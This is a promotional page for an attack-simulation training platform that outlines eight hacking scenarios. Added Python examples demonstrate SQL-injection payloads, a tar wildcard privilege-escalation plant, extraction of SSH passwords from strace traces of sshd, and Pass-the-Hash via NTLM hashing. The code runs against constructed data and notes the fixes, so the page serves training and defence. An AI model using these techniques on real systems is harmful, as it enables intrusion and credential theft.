
- Test your skills in simulated cyber attacks
- Choose the attack scenario and its level of difficulty
- Go through each task and learn
- Recognize and understand what happens during hacking attacks
What is Hacking Arena?
What is the point of Hacking Arena?
How does the Hacking Arena work?
How do you get into the Hacking Arena?

3 levels
3 rounds
8 scenarios
Take on the role of a real attacker, choose the scenario that suits you best and test your skills against its objectives. Everyone's skills and abilities differ, so each scenario can be played at 3 levels of difficulty.
Choose from three difficulty levels

Script Kiddie – You receive a complete manual: all the necessary information and procedures, the tools to use, and step-by-step instructions on how to exploit the vulnerabilities.

Normal – You receive basic hints that steer you towards the vulnerability in question, plus a general guide on how best to exploit the flaw so that your attack succeeds.

Hardcore – You receive only the attack vector and the network device that carries the vulnerability; the rest is up to you and your skills.
3 rounds and 8 scenarios
Breaking the Perimeter
In this scenario your job is to attack the employees of a fictional company. The attack consists of creating malware and running the phishing campaign that delivers it.
The scenario focuses on gathering information about the employees of the fictitious company and picking out those who are likely to be most susceptible to social-engineering attacks. Once you have a list of potential targets, you need to build a credible phishing campaign, i.e. write an enticing e-mail. The message carries a payload generated with the Covenant C2 framework; when the campaign succeeds and the payload runs, it gives you command execution on the victim's workstation.
In this scenario, your job is to identify and exploit SQL Injection vulnerabilities on the HackingArena web server.
The scenario focuses on web applications, specifically the injection of SQL into unsanitized inputs. The application is simple and finding the vulnerability takes a minimum of time; the emphasis in this task is on exploiting the vulnerability rather than discovering it. First you need to determine the type and version of the DBMS, i.e. the software that manages the data, because the payloads for the next step depend on which engine you are facing. With that known, the task is to craft a query that lets you run commands on the vulnerable server.
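The two steps described above, fingerprinting the DBMS through the injection point and then using the same UNION trick to pull data the application never shows, as an added example (not Hacking Arena's own material). It runs against a constructed in-memory SQLite database with a made-up products table, so the vulnerable and parameterized lookups, the payload list and the table contents are all assumptions. Turning the injection into command execution is DBMS-specific (for example xp_cmdshell on Microsoft SQL Server or COPY ... FROM PROGRAM on PostgreSQL) and has no SQLite equivalent, so the example stops at fingerprinting and schema disclosure.

```python
import sqlite3


# Constructed stand-in for the scenario's web application: an in-memory SQLite
# database with a made-up products table (example data, not Hacking Arena's).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, internal_note TEXT)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "widget", "supplier price 4.10"), (2, "gadget", "supplier price 9.80")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, name: str) -> list:
    """The flaw: user input concatenated straight into the statement."""
    sql = f"SELECT name FROM products WHERE name = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, name: str) -> list:
    """The fix: a parameterized query; the input is only ever a value."""
    rows = conn.execute("SELECT name FROM products WHERE name = ?", (name,))
    return [row[0] for row in rows]


# Step 1 of the scenario: fingerprint the DBMS. Each engine exposes its version
# through a different function, so trying the payloads in turn tells you which
# engine it is: the ones that do not exist raise an error instead of returning
# a row. The closing quote of the original statement is neutralised by the
# trailing -- comment.
FINGERPRINT_PAYLOADS = {
    "mysql or mssql": "' UNION SELECT @@version -- ",
    "postgresql": "' UNION SELECT version() -- ",
    "sqlite": "' UNION SELECT sqlite_version() -- ",
}


def fingerprint_dbms(conn: sqlite3.Connection) -> tuple:
    for dbms, payload in FINGERPRINT_PAYLOADS.items():
        try:
            rows = vulnerable_lookup(conn, payload)
        except sqlite3.OperationalError:
            continue  # no such function / bad token: not this engine
        if rows:
            return dbms, rows[0]
    return None, None


def enumerate_schema(conn: sqlite3.Connection) -> list:
    """Step 2 on SQLite: the same UNION reads the schema, including columns the
    application never displays (sqlite_master here; information_schema on
    MySQL or PostgreSQL)."""
    return vulnerable_lookup(conn, "' UNION SELECT sql FROM sqlite_master -- ")


def demo() -> dict:
    conn = build_db()
    dbms, version = fingerprint_dbms(conn)
    return {
        "dbms": dbms,
        "version": version,
        "schema": enumerate_schema(conn),
        # The same payload against the parameterized query finds nothing:
        "safe_result": safe_lookup(conn, FINGERPRINT_PAYLOADS["sqlite"]),
    }


if __name__ == "__main__":
    print(demo())
```

The payloads are UNION-based, so they only work when the injected SELECT returns the same number of columns as the original query; on a real target the column count is the first thing to establish, and the MySQL and MSSQL payloads are identical because both engines expose `@@version`.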
In this scenario, you must identify and exploit a known vulnerability in a mail server to breach HackingArena's perimeter defences.
The first step in this scenario, as in the real world, is enumeration of the software in use. Once you have determined the product and version, the next step is to look for known vulnerabilities; there are many public databases of exploits for vulnerable software versions. After finding a candidate exploit for the version you identified, you need to establish what it requires: whether the vulnerability can be exploited unauthenticated or whether it needs valid credentials. In the end, exploiting the publicly known vulnerability yields remote code execution. In this scenario the participant learns to find information that is publicly available on the Internet and put it to use.
Privilege Escalation
In this scenario, your job is to obtain the highest local privileges on one of the user workstations.
The scenario introduces the attacker to the options for privilege escalation on an ordinary Windows 10 workstation. As always, the first step to success is system enumeration: what is running, how services are configured, and what the directories and files contain. Fortunately this does not have to be done by hand; existing scripts automate the process. The enumeration reveals a route to privilege escalation through a misconfigured service over which the compromised user has rights. Once again the Covenant tool is used to exploit it.
In this scenario, your job is to obtain the highest privileges on a database server.
The scenario familiarizes you with the options for privilege escalation on UNIX-like systems. As always, the first step to success is system enumeration: what is running, how services are configured, and what the directories and files contain. Fortunately this does not have to be done by hand; existing scripts automate the process. The enumeration reveals several potential routes to privilege escalation. This scenario focuses on exploiting UNIX wildcards: when a process running as root expands an unquoted wildcard, filenames that look like command-line options are handed to the program as options, so an attacker who can create files in that directory can inject parameters of their choosing into a root process. The injected parameter carries commands we choose, which then run as the root user.
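The wildcard injection described above, as an added example (not Hacking Arena's own material). It assumes a made-up privileged backup job of the form `cd /var/backups/db && tar cf /tmp/db.tar *`, reproduces the shell's expansion of `*` explicitly, and plants the well-known GNU tar `--checkpoint` option files; the payload only creates a marker file in place of what a real attacker would run. The job runs as the current user here, so the example demonstrates the mechanism, not the privilege gain itself. Everything is created in a temporary directory and removed afterwards.

```python
import os
import shutil
import subprocess
import tempfile

# Assumed cron entry run by root (constructed for this example):
#     cd /var/backups/db && tar cf /tmp/db.tar *
# The shell, not tar, expands the * into a sorted list of filenames.


def shell_glob(directory: str) -> list:
    """What an unquoted * expands to: every non-hidden name, sorted like the C locale."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def plant_payload(directory: str, marker: str) -> None:
    """An attacker with write access to the directory (but no root) drops three files.
    The two empty files are named like GNU tar options, so after expansion tar
    receives them as options rather than as files to archive."""
    script = os.path.join(directory, "shell.sh")
    with open(script, "w") as f:
        # Stand-in for a real payload: just create a marker file.
        f.write(f"#!/bin/sh\ntouch '{marker}'\n")
    os.chmod(script, 0o755)
    open(os.path.join(directory, "--checkpoint=1"), "w").close()
    open(os.path.join(directory, "--checkpoint-action=exec=sh shell.sh"), "w").close()


def gnu_tar_available() -> bool:
    """--checkpoint-action is a GNU tar feature; BusyBox and BSD tar lack it."""
    try:
        out = subprocess.run(["tar", "--version"], capture_output=True, text=True)
    except OSError:
        return False
    return "GNU tar" in out.stdout


def run_backup_job(directory: str, archive: str) -> list:
    """The privileged job as it actually executes after wildcard expansion."""
    argv = ["tar", "cf", archive, *shell_glob(directory)]
    if gnu_tar_available():
        subprocess.run(argv, cwd=directory, capture_output=True)
    return argv


def demo() -> dict:
    workdir = tempfile.mkdtemp()
    try:
        marker = os.path.join(workdir, "payload-ran")
        datadir = os.path.join(workdir, "backups")
        os.mkdir(datadir)
        with open(os.path.join(datadir, "db.sql"), "w") as f:
            f.write("-- constructed dump\n")
        plant_payload(datadir, marker)
        argv = run_backup_job(datadir, os.path.join(workdir, "db.tar"))
        return {"argv": argv, "payload_ran": os.path.exists(marker)}
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    print(demo())
```

The argv returned by `demo()` shows the problem directly: `--checkpoint-action=exec=sh shell.sh` and `--checkpoint=1` sort before `db.sql` and are parsed by tar as options. The fix on the defensive side is to never let a wildcard reach a privileged command unqualified: `tar cf /tmp/db.tar -- *` or `tar cf /tmp/db.tar ./*` keeps every expanded name a file operand.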
In this scenario, your job is to obtain the highest privileges on a database server.
The scenario familiarizes you with the options for privilege escalation on UNIX-like systems. As always, the first step to success is system enumeration: what is running, how services are configured, and what the directories and files contain. Fortunately this does not have to be done by hand; existing scripts automate the process. The enumeration reveals several potential routes to privilege escalation. This scenario focuses on manual analysis of executables and scripts that, under certain circumstances, could lead to privilege escalation. The analysis first works out in detail what the script does and then looks for a way, within the user's current permissions, to exploit the badly written script so that it executes your own code and thus grants root privileges.
Getting the Domain
In this scenario, your job is to obtain a domain administrator account by means of a database server you already control.
The server compromised in the previous scenarios is joined to the Active Directory environment and uses Kerberos authentication. The scenario assumes that the server is compromised (we have root privileges) and that, since it is domain-joined, domain users will log on to it at some point, normally over SSH. As root it is possible to use the strace tool to capture the system calls made by individual processes, including the sshd process that handles users' SSH connections. The task is therefore to capture login credentials as they pass through sshd and use them to elevate your privileges to domain admin.
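The post-processing half of the technique above, as an added example (not Hacking Arena's own material): reading strace's escaped `write()` output back into bytes and finding the credential in it. The sample lines are constructed in the shape of `strace -f -s 256 -e trace=write` output, with made-up pid, file descriptors and text; what the code relies on is real: strace prints string arguments with C escapes (`\0`, `\f`, `\v`, octal `\NNN`, or `\xNN` with `-x`), and the SSH protocol carries a password as a "string", a big-endian uint32 length followed by the bytes (RFC 4251). The scanner looks for that framing rather than assuming anything about where in sshd's traffic it appears.

```python
import re
import struct

# Constructed sample in the shape of strace -f -s 256 -e trace=write output.
# The pid, fds and text are made up for this example.
SAMPLE_STRACE_LINES = [
    r'[pid 21433] write(4, "\0\0\0\20\f", 5) = 5',
    r'[pid 21433] write(4, "\0\0\0\vWinter2024!", 15) = 15',
    r'[pid 21433] write(2, "debug1: userauth-request for user jdoe\n", 39) = 39',
]

_SIMPLE_ESCAPES = {"n": 10, "t": 9, "r": 13, "f": 12, "v": 11, "a": 7, "b": 8, "\\": 92, '"': 34}


def unescape_strace(text: str) -> bytes:
    """Reverse strace's C-style escaping of a string argument."""
    out = bytearray()
    i = 0
    while i < len(text):
        ch = text[i]
        if ch != "\\":
            out.append(ord(ch))
            i += 1
            continue
        nxt = text[i + 1]
        if nxt in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[nxt])
            i += 2
        elif nxt == "x":                       # \xNN, produced by strace -x
            out.append(int(text[i + 2:i + 4], 16))
            i += 4
        elif nxt in "01234567":                # \N, \NN or \NNN octal
            j = i + 1
            while j < len(text) and j < i + 4 and text[j] in "01234567":
                j += 1
            out.append(int(text[i + 1:j], 8) & 0xFF)
            i = j
        else:                                  # unknown escape: keep the character
            out.append(ord(nxt))
            i += 2
    return bytes(out)


_WRITE_RE = re.compile(r'(?:\[pid\s+\d+\]\s*)?write\((\d+),\s*"(.*)",\s*\d+\)\s*=\s*-?\d+')


def parse_write_line(line: str):
    """Return (fd, payload bytes) for a write() line, or None for anything else."""
    m = _WRITE_RE.match(line.strip())
    if not m:
        return None
    return int(m.group(1)), unescape_strace(m.group(2))


def extract_ssh_strings(buf: bytes, min_len: int = 1) -> list:
    """Find printable payloads framed as SSH strings (uint32 length + bytes) in buf."""
    found = []
    for off in range(len(buf) - 4):
        (n,) = struct.unpack_from(">I", buf, off)
        if min_len <= n <= len(buf) - off - 4:
            body = buf[off + 4:off + 4 + n]
            if all(0x20 <= b < 0x7F for b in body):
                found.append(body.decode("ascii"))
    return found


def passwords_from_strace(lines) -> list:
    """(fd, candidate) pairs for every write() that carries an SSH-framed string."""
    hits = []
    for line in lines:
        parsed = parse_write_line(line)
        if parsed is None:
            continue
        fd, payload = parsed
        for candidate in extract_ssh_strings(payload):
            hits.append((fd, candidate))
    return hits


if __name__ == "__main__":
    print(passwords_from_strace(SAMPLE_STRACE_LINES))
```

Plain log text such as the third sample line never matches, because any four printable bytes read as a length far larger than the buffer. Keep `-s` large enough when tracing; strace's default string limit of 32 bytes truncates longer writes with `...` and the framing check then fails.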
In this scenario, your job is to obtain a domain administrator account by means of a user workstation you already control.
The workstation compromised in the previous scenarios is joined to the Active Directory environment. Under certain conditions, Windows keeps the password hashes (and sometimes the plaintext passwords) of users who log on to the system in memory, in the LSASS process. Having compromised the system with the highest privileges, we can read these hashes from memory with the publicly known Mimikatz tool. What's more, with default settings Windows permits a technique called Pass-the-Hash: NTLM authentication only proves possession of the password hash, so we can log in with the hash alone, without ever knowing the original password. In this scenario, your job is to extract users' hashes from memory and then use them to compromise other systems with Pass-the-Hash. The goal is to obtain the domain administrator's hash or password, i.e. to compromise the Windows domain.
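Why Pass-the-Hash works, as an added example (not Hacking Arena's own material). The NT hash is MD4 over the UTF-16LE password, and the NTLMv2 response a client sends is HMAC-MD5 keyed by that hash (MS-NLMP NTOWFv2 and NTProofStr), so a client holding only the hash computes exactly the same answer as one holding the password. MD4 is implemented inline because OpenSSL 3 ships it only in its legacy provider and `hashlib.new("md4")` is therefore not reliably available. The user, domain, password, challenge and the simplified client blob are constructed values.

```python
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; implemented here because hashlib may not offer it."""
    mask = 0xFFFFFFFF

    def rotl(x, s):
        return ((x << s) | (x >> (32 - s))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = (-i) % 4  # the register being updated rotates a, d, c, b, a, ...
                b, c, d = r[(a + 1) % 4], r[(a + 2) % 4], r[(a + 3) % 4]
                r[a] = rotl((r[a] + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
        state = [(s + t) & mask for s, t in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This is what Mimikatz reads from LSASS."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt_hash_bytes: bytes, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: HMAC-MD5 keyed by the NT hash over UPPER(user) + domain."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash_bytes, data, hashlib.md5).digest()


def ntlmv2_response(nt_hash_bytes: bytes, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTProofStr || blob. Note the only secret input is the NT hash."""
    key = ntowf_v2(nt_hash_bytes, user, domain)
    proof = hmac.new(key, server_challenge + client_blob, hashlib.md5).digest()
    return proof + client_blob


def demo() -> dict:
    # Constructed values standing in for the scenario's domain.
    password, user, domain = "Winter2024!", "jdoe", "CORP"
    server_challenge = bytes.fromhex("0123456789abcdef")
    # Simplified NTLMv2 client blob: type 1.1, reserved, timestamp, client nonce, reserved.
    client_blob = b"\x01\x01\x00\x00" + b"\x00" * 4 + b"\x00" * 8 + bytes.fromhex("aaaaaaaaaaaaaaaa") + b"\x00" * 4

    legitimate = ntlmv2_response(nt_hash(password), user, domain, server_challenge, client_blob)
    # The attacker never sees `password`; all they took from memory is this hex string.
    dumped_hash_hex = nt_hash(password).hex()
    replayed = ntlmv2_response(bytes.fromhex(dumped_hash_hex), user, domain, server_challenge, client_blob)
    return {"nt_hash": dumped_hash_hex, "same_response": legitimate == replayed}


if __name__ == "__main__":
    print(demo())
```

Because the hash is a password-equivalent, rotating the password is the only thing that invalidates a dumped hash; this is also why Microsoft's Credential Guard and the "Protected Users" group exist, both of which keep the NT hash out of LSASS for the accounts they cover.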
I would like to enter the Hacking Arena
Voctářova 2500/20a
180 00 Praha 8 Libeň
CRN: 04772148
TIN: CZ04772148
ISDS (data box ID): 9kvkzi9
Personal data is processed so we can offer Aricoma products and services by telephone, e-mail and other communication channels. This includes contact details and other personal data that we obtain directly from you. Your consent to processing is limited to a period of three years. The personal data controller is exclusively Aricoma Enterprise Cybersecurity a.s., CRN 04772148, Voctářova 2500/20a, 180 00 Praha 8. You have the right to withdraw your consent at any time by informing the company at Aricoma, Voctářova 20a, 180 00 Praha or at the e-mail: gdpr [at] aricoma.com. If you withdraw your consent, your personal data will no longer be processed for the aforementioned purpose and the data collected for this purpose will be destroyed, unless there is another legal reason for processing them. If you suspect that the processing of your personal data violates the current legislation, you have the right to file a complaint with the Office for Personal Data Protection, Pplk. Sochora 27, 170 00 Praha 7; www.uoou.cz.